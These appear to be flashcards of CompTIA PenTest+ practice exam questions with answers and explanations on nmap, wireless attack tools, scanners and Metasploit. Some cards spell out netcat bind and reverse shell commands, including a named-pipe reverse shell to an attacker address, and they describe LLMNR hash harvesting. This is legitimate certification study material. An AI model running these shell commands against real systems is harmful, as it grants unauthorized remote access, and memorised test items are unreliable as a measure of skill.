CompTIA PenTest+ Certification Practice Exam Chapter 4 (Total Sem Online Material) Flashcards

1
Q
Which tool is used to craft packets for injection into a wireless network—for instance, after obtaining an XOR file from a fragmentation or ChopChop attack against a WEP network?
A.aircrack-ng
B.airbase-ng
C.packetforge-ng
D.iwconfig
A

C.packetforge-ng

Explanation:
Packetforge-ng is used to craft ARP, UDP, ICMP, or other custom packets for injection into wireless networks. This is often used in conjunction with an XOR file obtained from a fragmentation or ChopChop attack to ultimately obtain a WEP key.

A, B, and D are incorrect. A is incorrect because aircrack-ng is a tool used to crack WEP and WPA-PSK keys; aircrack-ng also lends its name to a suite of tools used in penetration testing of wireless networks. B is incorrect because airbase-ng is a tool used to attack wireless clients rather than the APs to which they connect—for instance, by creating an evil twin AP to which a potential victim can connect. D is incorrect because iwconfig is a Linux utility used for configuration of wireless network interfaces.

2
Q
Which nmap flag is used to denote a simple ping scan?
A.-Pn
B.-sn
C.-v
D.-sL
A

B.-sn

Explanation:
The -sn nmap flag denotes a simple ping scan.

A, C, and D are incorrect. A is incorrect because the -Pn flag disables ping and skips host discovery. C is incorrect because the -v flag increases output verbosity. D is incorrect because the -sL flag is used when listing multiple targets to be scanned.

3
Q
Which nmap flag will redirect output to a file in the native, XML, and grep-friendly formats all at once?
A.-oN
B.-oG
C.-oX
D.-oA
A

D.-oA

Explanation:
The -oA flag will redirect nmap output to a file in the native, XML, and grep-friendly formats all at once.

A, B, and C are incorrect. A is incorrect because the -oN flag will only save scan results in the standard output format. B is incorrect because -oG will only save scan results in a grep-able format. C is incorrect because -oX will only save scan results in XML format.

4
Q
Developed by Rapid7, which commercially available vulnerability scanner features a web-based user interface and allows users to execute both credentialed and noncredentialed scans?
A.Nexpose
B.Nikto
C.W3AF
D.OpenVAS
A

A.Nexpose

Explanation:
Nexpose is developed by and available from Rapid7 and sports multiple features, such as remediation reports and integration with Metasploit Pro.

B, C, and D are incorrect. B is incorrect because Nikto is a command-line-only website and web application scanner developed by Chris Sullo and David Lodge. C is incorrect because W3AF (the Web Application Attack and Audit Framework) is an open-source, Python-based web application scanner developed by Andres Riancho and numerous contributors and sponsors. D is incorrect because OpenVAS is an open-source vulnerability scanner composed of several services and tools, rather than strictly a website and web application scanner.

5
Q
Which of the following tools would be most appropriate when attempting to perform an LLMNR poisoning attack?
A.airodump-ng
B.Wireshark
C.tcpdump
D.Responder
A

D.Responder

Explanation:
Responder is a Python-based tool that simplifies the process of poisoning name resolution services. Responder is able to effectively target LLMNR, NBT-NS, and mDNS services.

A, B, and C are incorrect. A is incorrect because airodump-ng is a component of the aircrack-ng suite used to capture raw frames in 802.11 Wi-Fi networks. B is incorrect because Wireshark is a network protocol analyzer that sniffs out network traffic and displays the contents of packets going across a network. It is often used for general network troubleshooting or in software development but also has value in penetration testing, where it can be leveraged to verify network security implementations, or intercept plaintext communications. C is incorrect because tcpdump is another network protocol analyzer and is also used to troubleshoot networks, assist in software development, or for security purposes. Tcpdump is predominantly used as a command-line tool, although graphical interfaces for it exist.

6
Q
Which of the following are dictated by Nessus policies? (Choose two.)
A.Vulnerability information
B.Plugins in use
C.Configuration values
D.Remediation details
A

B.Plugins in use
C.Configuration values

Explanation:
Nessus policies dictate the plugins used for a scan and the associated configuration values.

A and D are incorrect. Vulnerability information and remediation details are components of the output of a Nessus scan, rather than facets defined before the scan takes place.

7
Q
Which command within the Metasploit Framework can integrate finished scan results from various automated tools to track targets, services, and other features of interest to a penetration tester?
A.workspace
B.services
C.db_import
D.db_nmap
A

C.db_import

Explanation:
db_import can be used to import output files from multiple automated scanners and other tools, integrating their data into the Metasploit Framework for tracking of hosts, IP addresses, discovered vulnerabilities, and identified account credentials.

A, B, and D are incorrect. None of these answers is used to integrate information into a Metasploit workspace from external sources. A is incorrect because the workspace command is used to create, destroy, switch, and list the available workspaces within the Metasploit Framework, which is helpful in keeping environment data separated between different penetration testing engagements. B is incorrect because the services command is used to add to, delete from, list, or search within the range of identified services running on hosts identified within a Metasploit Framework workspace. D is incorrect because the db_nmap command is used to execute an nmap scan from within the Metasploit Framework, which will automatically incorporate its results into the workspace, tracking any discovered hosts and services as appropriate. Note that this differs from the correct answer in that, while it is importing nmap scan results, the scan is being conducted live rather than simply importing existing nmap output files.

8
Q
Which tool is a security auditing framework for Android that helps penetration testers identify and validate vulnerabilities discovered in applications? It consists of two components: an agent installed on a mobile device, and a console installed on a tester’s workstation.
A.Android Studio
B.Drozer
C.Xcode
D.ADB
A

B.Drozer

Explanation:
The tool described is Drozer; it is an excellent tool for DAST and has some value in reverse engineering of Android APK files.

A, C, and D are incorrect. A is incorrect because Android Studio is primarily used to develop and build packages for its target mobile environment, and it has some utility in static application analysis when provided with the project file used to create the installable application package. C is incorrect because Xcode is Apple’s development framework used to develop applications for iOS in Swift or Objective-C on macOS. D is incorrect because the Android Debug Bridge (ADB) is a means for connecting to an Android device when one has physical access; ADB can be used for package installation and mobile system enumeration.

9
Q
Which open-source command-line-exclusive tool is a rather robust web server scanner that checks for potentially dangerous files, outdated software versions, and server configuration items?
A.Dirbuster
B.Burp Suite
C.nikto
D.BeEF
A

C.nikto

Explanation:
The tool described is nikto. In addition to the features listed in the question, nikto provides full SSL and HTTP proxy support, the ability to save scan output in multiple formats, and methods for host authentication for credentialed scanning. It should be noted that nikto is a very “noisy” scanner; it was designed to scan targets quickly and efficiently—stealth was not and is not a goal for its development.

A, B, and D are incorrect. A is incorrect because, while Dirbuster is a web server scanning tool that can be launched and interacted with via the command line, it is a Java application with a functional graphical interface. Since Dirbuster is not exclusive to the command line, only scans for hidden pages and subdirectories on a web server, and does not identify outdated software versions or configuration items as nikto does, this answer is incorrect. It should be further noted that Dirbuster is a deprecated tool; its functionality has been absorbed by the OWASP ZAP project as an add-on. B is incorrect because Burp Suite is a Java-based software tool for web vulnerability assessments that is capable of detecting numerous vulnerabilities, identifying attack insertion points, and other issues that degrade the security of a web application or web server. While Burp Suite can be run from the command line (in what is termed “headless mode”), it is not exclusive to the command line and is in fact most frequently used via its graphical interface, making this answer incorrect. D is incorrect because BeEF is a Ruby-based framework developed by The BeEF Project, designed to assist penetration tests by focusing on client-side attack vectors, rather than a web server scanner. While BeEF does have a command-line console available, it is commonly run from its graphical interface, much like Burp Suite. For these reasons, this answer is incorrect.

10
Q

Consider the following nmap output:

Nmap scan report for 10.1.2.3 
Host is up (0.00034s latency). 
Not shown: 389 closed ports 
PORT     STATE SERVICE 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
2049/tcp open  nfs 
5432/tcp open  postgresql 
5900/tcp open  vnc 
Read data files from: /usr/bin/../share/nmap 
# Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address (1 host up) scanned in 0.05 seconds
Assuming standard ports and options are in use, which of the following options would be a good flag to add for additional scans to further enumerate the service running on port 2049?
A.--script=nfs-*
B.--script=pgsql-brute
C.--script=http-enum
D.--script=telnet*
A

A.--script=nfs-*

Explanation:
In this case, --script=nfs-* would be most useful for further enumeration of port 2049, given standard ports. One helpful feature of nmap is its support for wildcard characters. In the sample listed here, --script=nfs-* would call all scripts with names beginning with nfs-. In this case, one would expect to see the scripts nfs-ls, nfs-showmount, and nfs-statfs loaded.

B, C, and D are incorrect. None of these options would affect port 2049 given the use of standard ports. B is incorrect because --script=pgsql-brute would be expected to run against port 5432, which is a standard port used for PostgreSQL. C is incorrect because --script=http-enum would be expected to run against port 80, the standard port for HTTP. D is incorrect because --script=telnet* would be expected to run against port 23, the standard port for telnet.

11
Q

Which command will establish a bound shell on a Windows host? Assume that the nc executable is in the present working directory, the attacking system IP address is 10.1.2.2, and the victim IP address is 10.1.4.4.
A.nc.exe -nv 10.1.2.2 4444 C:\Windows\System32\cmd.exe
B.nc.exe -nvlp 10.1.4.4 4444 cmd.exe
C.nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe
D.nc.exe -nv 10.1.4.4 4444 -e C:\Windows\System32\cmd.exe

A

C.nc.exe -nvlp 4444 -e C:\Windows\System32\cmd.exe

Explanation:
A bound shell requires at a minimum the -l and -p flags (to establish a listener and designate the listening port, respectively), a port number, and then the -e flag followed by the command to execute through the netcat connection (in this case, Windows’ cmd.exe).

A, B, and D are incorrect. A is incorrect because it is attempting to establish a reverse shell, as there is no -l or -p flag present to indicate that a listener is being established on the local host. In addition, this command would attempt to connect to a port on the Windows system itself, which would likely fail as there would not likely be any service listening on port 4444. This answer is also missing the -e flag, which is necessary before declaring the command to be executed across the netcat connection. B is incorrect because it attempts to establish a listener on the attacking system; this would be met with an error because the IP address 10.1.4.4 would not be available on the victim Windows host to bind a port. In addition, there is no -e flag before the cmd.exe call, which would produce a syntax error. D is incorrect because the command listed would provide a reverse shell to an established netcat listener on the attacking system at port 4444; as stated previously, bound shells require the -l and -p flags in addition to the -e flag.

12
Q
Which freely available, open-source web application scanning tool provides automated vulnerability scanning, traffic interception, and HTTP parameter tampering in addition to a robust RESTful API?
A.OWASP ZAP
B.nikto
C.Nexpose
D.Qualys WAS
A

A.OWASP ZAP

Explanation:
OWASP ZAP is a free, open-source web application and web server scanning tool. It boasts numerous features similar to those found in Burp Suite, including automated scanning, site fuzzing, and a marketplace for add-ons and plugins.

B, C, and D are incorrect. B is incorrect because nikto is an open-source, command-line-based web server scanner that checks for potentially dangerous files, outdated software versions, and server configuration items. It can perform neither traffic interception nor HTTP parameter tampering, nor does it provide an API, making this answer incorrect. C is incorrect because Rapid7’s Nexpose is a broad-scale, commercial vulnerability scanner. Since Nexpose is a commercial, proprietary product that is not limited to web server scanning and is incapable of traffic interception, this answer is incorrect. D is incorrect because Qualys WAS (Web Application Scanner) is a commercial, cloud-based web application scanning and vulnerability discovery service. As Qualys WAS is also a commercial, proprietary product, this answer is also incorrect.

13
Q
Which tool is used for association with wireless networks and packet injection?
A.airmon-ng
B.bluesnarfer
C.aireplay-ng
D.reaver
A

C.aireplay-ng

Explanation:
Aireplay-ng is a component of the aircrack-ng suite, and enables users to inject packets into wireless networks.

A, B, and D are incorrect. A is incorrect because airmon-ng is a script used to set wireless network cards to monitor mode. B is incorrect because bluesnarfer is used for bluesnarfing attacks, which steal phonebooks and other information from Bluetooth-enabled devices. D is incorrect because reaver is a tool used for attacks against WPS-enabled networks.

14
Q
Which Python-based tool allows users to craft packets and decode data with extreme precision, and is often used itself to create more refined tools?
A.scapy
B.Responder
C.hping3
D.BeEF
A

A.scapy

Explanation:
Scapy is an interactive, Python-based packet manipulation program that is able to forge and decode packets for a wide range of protocols. Its versatility enables users to handcraft packets with relative ease, enabling tool development or quicker testing efforts where other tools are not quite able to meet the tester’s needs.

B, C, and D are incorrect. B is incorrect because, although Responder is a Python-based tool, it enables users to poison name resolution services rather than design, craft, send, and decode packets. C is incorrect because, while hping3 is a command-line TCP/IP packet analyzer and assembler, it is written in C and lacks much of the functionality and granularity found in scapy. D is incorrect because BeEF is a Ruby-based framework developed by The BeEF Project designed to assist penetration tests by focusing on client-side attack vectors.

15
Q
Which tool is used heavily in web server and web application testing, providing numerous features such as automated vulnerability detection, native traffic proxying and interception, automated site content discovery, on-the-fly parameter tampering, and robust plugin support for additional modules to expand functionality or target-specific classes of vulnerability?
A.gobuster
B.Burp Suite
C.Nessus
D.Hydra
A

B.Burp Suite

Explanation:
The tool described is PortSwigger’s Burp Suite. The key indicator here is the ability to intercept HTTP and HTTPS traffic on the fly and modify it for the purposes of testing.

A, C, and D are incorrect. A is incorrect because gobuster is a Go-based, command-line-exclusive tool designed to brute-force uniform resource identifiers (URIs) and DNS subdomains. It is incapable of any of the other features listed in the question, making this answer incorrect. C is incorrect because Nessus is a web-based vulnerability scanner that detects and alerts on potential vulnerabilities on target systems; it does not exclusively target web servers and web applications, nor is it capable of traffic interception or modification, making this answer incorrect. D is incorrect because Hydra is a parallelized login brute-force tool that can attack numerous protocols, including HTTP and HTTPS, LDAP, MySQL, and SSH, among many others. It does not provide any automated vulnerability scanning features, nor is it capable of content discovery, traffic interception, or parameter tampering, making this answer incorrect as well.

16
Q

Which of the following commands would silently (that is, without terminal output) create a simple text file with a list of IP addresses on a given subnet that responded to ICMP requests? Assume that you are attempting to identify systems on the 10.2.22.X subnet.
A.for i in 1..254; do ping -c 2 10.2.22.$i 2&>1 >/dev/null && echo 10.2.22.$i >> hosts.txt; done
B.for i in 10.2.22.{1..254}; do ping -c 2 $i 2&>1 >/dev/null || echo $i >> hosts.txt; done
C.for i in 10.2.22.{1..254}; do ping -c 2 $i 2>&1 >/dev/null && echo $i >> hosts.txt; done
D.for i in 10.2.22.{1..254}; do ping -c 2 $i && echo $i > hosts.txt; done

A

C.for i in 10.2.22.{1..254}; do ping -c 2 $i 2>&1 >/dev/null && echo $i >> hosts.txt; done

Explanation:
The for loop performs a two-packet-long ping of a host, redirecting all output to /dev/null. If the ping command is successful, the IP address is added to a file named hosts.txt; this command sequence is performed for all IP addresses in the 10.2.22.0/24 subnet. Note that this command cannot guarantee that systems that do not respond are not available; it is fairly common to see firewalls configured to discard ICMP requests, meaning these ping attempts would fail.

A, B, and D are incorrect. A is incorrect because the for loop component is not built properly; this “loop” would run once as written against the IP address 10.2.22.1..254 before failing out. B is incorrect because the use of the || operator would see a text file created that only tracks hosts that are unavailable to ICMP requests, restricting its usefulness to little beyond telling a reader which systems are available via the process of elimination. D is incorrect because the command sequence here is missing the 2>&1 >/dev/null output redirection, meaning it would constantly display statuses on a terminal window, failing in the stated objective of being silent during operation.

17
Q
What is the typical goal of LLMNR or NBT-NS poisoning attacks?
A.Interception of traffic data
B.Disruption of LLMNR services
C.Destruction of existing LLMNR records
D.Password collection
A

D.Password collection

Explanation:
LLMNR is a multicast, local-network-only name resolution service that queries all hosts on a given local link for a particular hostname and accepts the first response it receives as an authoritative source. If the victim is attempting to access a resource that requires authentication, it will then send an NTLM hash to the attacking system, which can then be cracked offline to harvest passwords.

A, B, and C are incorrect. A is incorrect because the key target is the victim’s username and password, rather than the traffic they intended to send. B is incorrect because disruption of LLMNR would require an attack on the entire network, as it is a protocol that communicates via multicast (that is, by sending requests to all hosts on a given network). C is incorrect because LLMNR by its nature does not have records in the traditional sense; instead, it relies on the assumption that all servers identify themselves honestly and accurately. This inherent trust makes LLMNR vulnerable to exploitation by simply claiming to be the system or resource the victim is attempting to access.

18
Q

Consider the following nmap output:

Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.1.2.3 () Status: Up
Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///,
110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///,
443/closed/tcp//https///, 445/open/tcp//microsoft-ds///,
3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33
Seq Index: 198 IP ID Seq: All zeros
# Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds

Based on the scan output, which of the following scan flags was most likely run?
A.-sS
B.-sY
C.-sU
D.-sC
A

A.-sS

Explanation:
A is correct. This scan would have been collected with a TCP SYN scan (sometimes called a stealth scan), given the options present. The first line of the sample shows how many ports were scanned and which type of scan was used for them. In this case, 10 ports were scanned with TCP, 0 with UDP, and 0 with SCTP. With that information, we can determine that -sS is the correct answer.

B, C, and D are incorrect. B and C are incorrect because although the -sY and -sU flags modify the type of scan being conducted, the output makes clear that neither an SCTP scan nor a UDP scan was conducted here. D is incorrect because we see no NSE data embedded in the output, which means -sC could not have been invoked in this scan.

20
Q

During a penetration test, you have obtained low privilege command execution via web application command injection on a target system where the installed version of netcat does not support the -e option. You elect to establish a reverse shell using a named pipe. The target IP address is 10.1.2.6, your attacking IP address is 10.1.2.2, and you have established a netcat listener with the command nc -nvlp 4444. Select the answer that will complete the command sequence to obtain a reverse shell callback.

Command sequence to complete: mknod /tmp/fifo p; /bin/sh -c "/bin/sh 0</tmp/fifo | ____"
A.nc 10.1.2.2 4444 1>/tmp/fifo
B.nc 10.1.2.2 4444 2>/tmp/fifo
C.1>/tmp/fifo > nc 10.1.2.2 4444
D.nc 10.1.2.6 4444 1>/tmp/fifo

A

A.nc 10.1.2.2 4444 1>/tmp/fifo

Explanation:
The correct answer takes the standard output (STDOUT, file descriptor 1) of the netcat connection (that is, the commands sent by the attacker, since this runs on the target system) and feeds it back into the named pipe, completing the reverse shell.

B, C, and D are incorrect. B is incorrect because it would feed the STDERR output of the netcat instance to the named pipe, resulting in nothing being fed to the /bin/sh instance unless there was an error in the netcat command (which would immediately close with a nonzero exit code). C is incorrect for a number of reasons: The STDOUT redirect is at the beginning of the line, which would place it directly after the named pipe. This is incorrect because the output redirect needs to go from the netcat connection to the named pipe. In addition, this configuration would dump the contents of /tmp/fifo to a file named “nc” in the current working directory, then fail when attempting to execute a command named “10.1.2.2”. D is incorrect because it attempts to establish an nc connection to the victim node—that is, the victim is attempting to call itself rather than the attacking system. Since there would be no callback, there would be no reverse shell, making this answer incorrect.

21
Q

Consider the following nmap output:

Ports scanned: TCP(10;21-23,25,80,110,139,443,445,3389) UDP(0;) SCTP(0;) PROTOCOLS(0;)
Host: 10.1.2.3 () Status: Up
Host: 10.1.2.3 () Ports: 21/open/tcp//ftp///, 22/open/tcp//ssh///, 23/open/tcp//telnet///, 25/open/tcp//smtp///, 80/open/tcp//http///,
110/closed/tcp//pop3///, 139/open/tcp//netbios-ssn///,
443/closed/tcp//https///, 445/open/tcp//microsoft-ds///,
3389/closed/tcp//ms-wbt-server/// OS: Linux 2.6.9 - 2.6.33
Seq Index: 198 IP ID Seq: All zeros
# Nmap done at Sat May 12 09:41:47 2018 -- 1 IP address (1 host up) scanned in 14.49 seconds

Of the given options, which nmap flag could produce output in the format shown?
A.-oN
B.-oG
C.-sU
D.-sV
A

B.-oG

Explanation:
The sample is in nmap’s grep-able output format, which means the flag used to generate this output is -oG.

A, C, and D are incorrect. A is incorrect because although the -oN flag produces an output file, it produces a file in the standard nmap output format. C and D are incorrect because these options control elements of the scan to be run; the -sU flag tells nmap to scan UDP ports whereas the -sV flag is used to trigger service identification during the scan.

23
Q

Consider the following nmap output:

Nmap scan report for 10.1.2.3 
Host is up (0.00034s latency). 
Not shown: 389 closed ports 
PORT     STATE SERVICE 
22/tcp   open  ssh 
23/tcp   open  telnet 
25/tcp   open  smtp 
53/tcp   open  domain 
80/tcp   open  http 
111/tcp  open  rpcbind 
139/tcp  open  netbios-ssn 
445/tcp  open  microsoft-ds 
2049/tcp open  nfs 
5432/tcp open  postgresql 
5900/tcp open  vnc 
Read data files from: /usr/bin/../share/nmap 
# Nmap done at Sat May 12 08:18:18 2018 -- 1 IP address (1 host up) scanned in 0.05 seconds
Based on this output, which of the following would have been a declared flag for this scan?
A.--top-ports=11
B.-sV
C.-sU
D.--top-ports=400
A

D.--top-ports=400

Explanation:
The correct answer is --top-ports=400. The clue here is in the total count of ports listed as scanned; 11 open ports shown plus 389 closed ports not shown means that 400 ports were probed in this scan.

A, B, and C are incorrect. A is incorrect because --top-ports=11 would only account for the 11 open ports, and not the additional 389 ports that were scanned but found to not be open. B is incorrect because the -sV flag is used to perform service identification in an nmap scan. C is incorrect because the -sU flag is used to trigger UDP scanning of the target in question.

24
Q
For which of the following services is Ettercap not able to sniff usernames and passwords without performing a man-in-the-middle attack on SSL or another data encryption method?
A.SSH2
B.FTP
C.HTTP
D.LDAP
A

A.SSH2

Explanation:
Ettercap is able to sniff usernames and passwords for SSH1, but not for SSH2.

B, C, and D are incorrect. Passwords for FTP, HTTP, and LDAP can all be sniffed out by Ettercap out of the box, but be careful here: note that these choices specifically address versions of these services that are not secured via SSL (that is, HTTPS and LDAPS) or tunneled through an SSH connection (that is, SFTP). Such distinctions can seem trivial, but a single letter is all it takes to make an answer incorrect. Read each question and answer carefully during the exam to avoid these potential snags.